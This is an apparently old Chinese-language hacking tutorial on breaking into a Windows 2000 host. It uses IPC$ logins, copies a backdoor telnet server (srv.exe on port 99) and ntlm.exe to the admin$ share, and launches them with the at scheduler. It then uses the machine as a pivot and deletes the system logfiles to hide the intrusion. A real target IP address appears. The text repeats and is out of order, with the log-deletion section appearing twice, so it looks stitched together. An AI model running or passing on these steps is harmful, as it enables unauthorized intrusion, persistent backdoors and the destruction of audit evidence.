C:\WINNT\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
好,現在我們來啓動WIN2000本身的telnet,首先終止srv.exe的telnet服務:
net stop telnet 系統告訴你並沒有啓動telnet,不理它,繼續:
net start telnet 這次真的啓動了telnet,我們可以在另開的命令提示符窗口telnet到對方的
23端口,驗證身份,輸入我們的guest賬號和密碼,它就真正成爲我們的跳板了。我們可以利用它到其它的主機去。
三、掃除腳印:
刪除爲net.exe 創建的快捷方式,刪除winnt\system32\logfiles下邊的日誌文件
退出對方系統,在本地機命令提示符下,輸入
net use \\IP Address\IPC$ ["password"] /user:"guset",通過IPC的遠程登陸就成功了。
登陸成功之後先複製一個Telnet的程序上去(小榕流光安裝目錄下的Tools目錄裏的Srv.exe,另外,還有ntml.xex,一會要用),這個程序是在對方上面開一個Telnet服務,端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然後利用定時服務啓動它,先了解對方的時間:
net time \\***.***.***.***
顯示:
\\***.***.***.*** 的當前時間是 2001/1/8 下午 08:55
命令成功完成。
然後啓動srv.exe:
at \\***.***.***.*** 09:00 srv.exe
顯示:
新加了一項作業,其作業 ID = 0
過幾分鐘後,telnet ***.***.***.*** 99
這裏不需要驗證身份,直接登錄,顯示:
c:\winnt:\system32>
我們就成功登陸上去了。然後又在本地打開命令提示符,另開一個窗口,輸入:
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目錄裏的ntlm.exe拷過去。然後又回到剛纔的telnet窗口,運行ntlm.exe
C:\WINNT\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
好,現在我們來啓動WIN2000本身的telnet,首先終止srv.exe的telnet服務:
net stop telnet 系統告訴你並沒有啓動telnet,不理它,繼續:
net start telnet 這次真的啓動了telnet,我們可以在另開的命令提示符窗口telnet到對方的
23端口,驗證身份,輸入我們的guest賬號和密碼,它就真正成爲我們的跳板了。我們可以利用它到其它的主機去。
三、掃除腳印:
刪除爲net.exe 創建的快捷方式,刪除winnt\system32\logfiles下邊的日誌文件